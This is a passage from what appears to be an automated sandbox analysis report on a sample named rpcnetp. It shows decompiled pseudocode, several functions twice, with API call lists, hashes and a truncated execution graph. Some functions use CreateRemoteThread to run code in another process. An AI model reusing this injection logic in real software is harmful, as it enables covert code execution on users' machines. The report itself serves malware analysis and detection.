					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E00A116BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 00A117AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A117F1
  • SetThreadPriority.KERNEL32(?,?), ref: 00A1180A
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
  • Instruction ID: d1c4f3c571ecc49952daf0508d9f171a0efcf99069b6d132ea9533ac55a8680b
  • Opcode Fuzzy Hash: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
  • Instruction Fuzzy Hash: 58116036500784AFCB319F659C44DE7BBF9FB89711B14891EFAA982101E331A981DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2250C
  • GetExitCodeThread.KERNEL32(?,?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2251A
  • CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523
  • TerminateProcess.KERNEL32(?,00000000,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2252F
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
  • Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
  • CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
  • Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A1253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E00A13223(E00A12314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00A12569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12583
  • CloseHandle.KERNEL32(00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A1258A
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
  • Instruction ID: b1093ab7c5c6a0f5073837ebc1c413455d88f623481f241cd39408b05255f513
  • Opcode Fuzzy Hash: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
  • Instruction Fuzzy Hash: 92F0B436900104BFDB00DBD4DC49FFE367CEB89721F204204F711921D0DB78AA829724
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}

APIs
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
  • Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
  • Opcode Fuzzy Hash: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
  • Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E00A129E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t65;

				_push(0x40);
				_push(0xa153e8);
				E00A14A94(__ebx, __edi, __esi);
				_t64 =  *((intOrPtr*)(_t65 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t65 - 0x20)) = 0;
				_t62 = 0;
				 *(_t65 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t65 - 0x24);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t65 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t65 + 0x10)) - _t62;
					if(_t53 >  *((intOrPtr*)(_t65 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t65 - 0x24));
					}
					_push(_t65 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t65 + 0xc)) + _t62);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t65 - 0x1c)) != _t58) {
						_t62 = _t62 +  *((intOrPtr*)(_t65 - 0x1c));
						 *((intOrPtr*)(_t65 - 0x28)) = _t62;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t62;
				if(_t62 != _t58) {
					lstrcpyA(_t65 - 0x50, "TagId");
					 *((intOrPtr*)(_t65 - 0x1c)) = 0x28;
					_push(0);
					_push(_t65 - 0x1c);
					_push(_t65 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c88))() != 0) {
						lstrcpyA(_t64 + 0x3cb0, _t65 - 0x50);
					}
					 *((intOrPtr*)(_t65 - 0x20)) = E00A12F96( *((intOrPtr*)(_t65 + 0xc)), _t62);
					_t58 = 0;
				}
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t65 - 0x20)) == _t58) {
					 *(_t64 + 0x5c) =  *(_t64 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t58;
				}
				return E00A1159C( *((intOrPtr*)(_t65 - 0x20)));
			}

APIs
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
  • Instruction ID: dddc32c03dc397f91921428a20a935034d069cde69a29059b6b10be023fa4b5d
  • Opcode Fuzzy Hash: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
  • Instruction Fuzzy Hash: 2131F671A0064AAFDF21CFA9CC85AEEB7F9FF48340F144529E565E6190DB70EA50CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0x72b260a8 == 0) {
					L5:
					__eflags =  *0x72b26088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f;
						if( *0x72b2605f == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8;
						if( *0x72b260b8 != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c;
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148);
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							__eflags =  *0x72b26034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0x72b260a0)) = 0;
								E72B237BE( *0x72b260a0, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					if( *0x72b2602c != 0 ||  *0x72b260b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}

APIs
  • PostThreadMessageA.USER32 ref: 72B22EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
  • CloseHandle.KERNEL32 ref: 72B22ED7
  • CreateThread.KERNEL32(00000000,00000000,72B23132,00000000,00000000,72B26148), ref: 72B22F85
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
  • Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0xa160a8 == 0) {
					L5:
					__eflags =  *0xa16088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E00A137BE(_t5, __eflags, 0xa1603c,  *0xa160a0);
						__eflags =  *0xa1605f;
						if( *0xa1605f == 0) {
							 *0xa160b8 = 0;
						}
						__eflags =  *0xa160b8;
						if( *0xa160b8 != 0) {
							L12:
							 *0xa16030 = 0xa1603c;
							_t6 = CreateThread(0, 0, E00A13132, 0, 0, 0xa16148);
							 *0xa160a8 = _t6;
						} else {
							 *0xa16034 =  *0xa16034 + 1;
							__eflags =  *0xa16034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0xa160a0)) = 0;
								E00A137BE( *0xa160a0, __eflags, 0xa1603c,  *0xa160a0);
								 *0xa1605f = 1;
								 *0xa160b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0xa16148, 0x12, 0, 0);
					WaitForSingleObject( *0xa160a8, 0x7530);
					CloseHandle( *0xa160a8);
					 *0xa160a8 = 0;
					_t5 =  *((intOrPtr*)(E00A13C14(0x1e, 0,  &_v8)));
					if( *0xa1602c != 0 ||  *0xa160b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}

APIs
  • PostThreadMessageA.USER32 ref: 00A12EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 00A12ECB
  • CloseHandle.KERNEL32 ref: 00A12ED7
  • CreateThread.KERNEL32(00000000,00000000,00A13132,00000000,00000000,00A16148), ref: 00A12F85
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
  • Instruction ID: d09e5ba222ce55b01dae2f5128c9ac96e5cded5fe215e3e7a2abb97474652b9d
  • Opcode Fuzzy Hash: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
  • Instruction Fuzzy Hash: B2219F79445284BEEF11DBE0BD80AD63F7AA71D384B09C069F545C6132C3618EEBDB24
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 72B21F62
  • TerminateThread.KERNEL32(?,00000000), ref: 72B21F77
  • CloseHandle.KERNEL32(?), ref: 72B21F83
  • LocalFree.KERNEL32(?), ref: 72B21F8A
    • Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
    • Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
    • Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
  • Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A11F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E00A11DE6(_t14, 0x7fffffff);
					}
					E00A11E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 00A11F62
  • TerminateThread.KERNEL32(?,00000000), ref: 00A11F77
  • CloseHandle.KERNEL32(?), ref: 00A11F83
  • LocalFree.KERNEL32(?), ref: 00A11F8A
    • Part of subcall function 00A11DE6: GetMessageA.USER32 ref: 00A11E0C
    • Part of subcall function 00A11DE6: TranslateMessage.USER32(?), ref: 00A11E33
    • Part of subcall function 00A11DE6: DispatchMessageA.USER32 ref: 00A11E3D
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
  • Instruction ID: 1c6aae05f1b48377124d60e0d9273015154b1b0493f446c0291fcd4c3bba5dad
  • Opcode Fuzzy Hash: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
  • Instruction Fuzzy Hash: FCF02731A02A10AFC7216BA1DC09FCE779CEF05711F004116F715E9190CB709AC2CB91
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage: 18.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 496
Total number of Limit Nodes: 15

Graph

72b21719 WaitForSingleObject CloseHandle 1907->1909 1910 72b21741 1908->1910 1911 72b2173e CloseHandle 1908->1911 1909->1908 1912 72b2174b CloseHandle 1910->1912 1913 72b2174e DeleteCriticalSection 1910->1913 1911->1910 1912->1913 1913->1902 1917 72b21f95 1914->1917 1916 72b21c37 ExitThread 1939 72b24a94 1917->1939 1919 72b21fa4 GetStdHandle 1920 72b21fcf 1919->1920 1940 72b24d44 1920->1940 1922 72b22004 1923 72b2206c 1922->1923 1924 72b22031 GetStdHandle 1922->1924 1943 72b21775 1923->1943 1924->1923 1925 72b2203a 1924->1925 1928 72b22052 CreateRemoteThread 1925->1928 1928->1923 1929 72b220ee 1968 72b24dc6 1929->1968 1930 72b21775 32 API calls 1933 72b220a6 1930->1933 1932 72b22104 1932->1916 1933->1929 1934 72b220b9 1933->1934 1951 72b22429 1933->1951 1936 72b220e1 1934->1936 1937 72b220be ResumeThread WaitForMultipleObjects CloseHandle 1934->1937 1936->1929 1964 72b21d27 1936->1964 1937->1929 1939->1919 1941 72b24d58 1940->1941 1942 72b24d61 GetVersion 1941->1942 1942->1922 1944 72b2178a InitializeCriticalSection CreateEventA CreateEventA 1943->1944 1950 72b21818 1943->1950 1945 72b21812 1944->1945 1946 72b217dd 1944->1946 1947 72b216ba 8 API calls 1945->1947 1946->1945 1948 72b21801 SetThreadPriority 1946->1948 1949 72b217e6 CreateThread 1946->1949 1947->1950 1948->1950 1949->1945 1949->1948 1974 72b21829 1949->1974 1950->1929 1950->1930 1952 72b22446 1951->1952 1953 72b2245a 1951->1953 1954 72b22449 1952->1954 1955 72b2245c SetEvent 1952->1955 1953->1955 1956 72b22468 1954->1956 1957 72b2244c ResetEvent 1954->1957 1955->1956 1958 72b224b3 1956->1958 1959 72b21a7e 2 API calls 1956->1959 1957->1956 1958->1934 1960 72b2247a WaitForSingleObject 1959->1960 1961 72b2253c 5 API calls 1960->1961 1962 72b224ab 1961->1962 1963 72b215ad 2 API calls 1962->1963 1963->1958 1965 72b21d33 1964->1965 1966 72b21d78 1965->1966 1967 72b24dc6 3 API calls 1965->1967 1966->1936 1967->1966 1969 72b24dd2 1968->1969 1997 72b234a6 1969->1997 1971 72b24dde 2002 72b21b4e 1971->2002 1973 
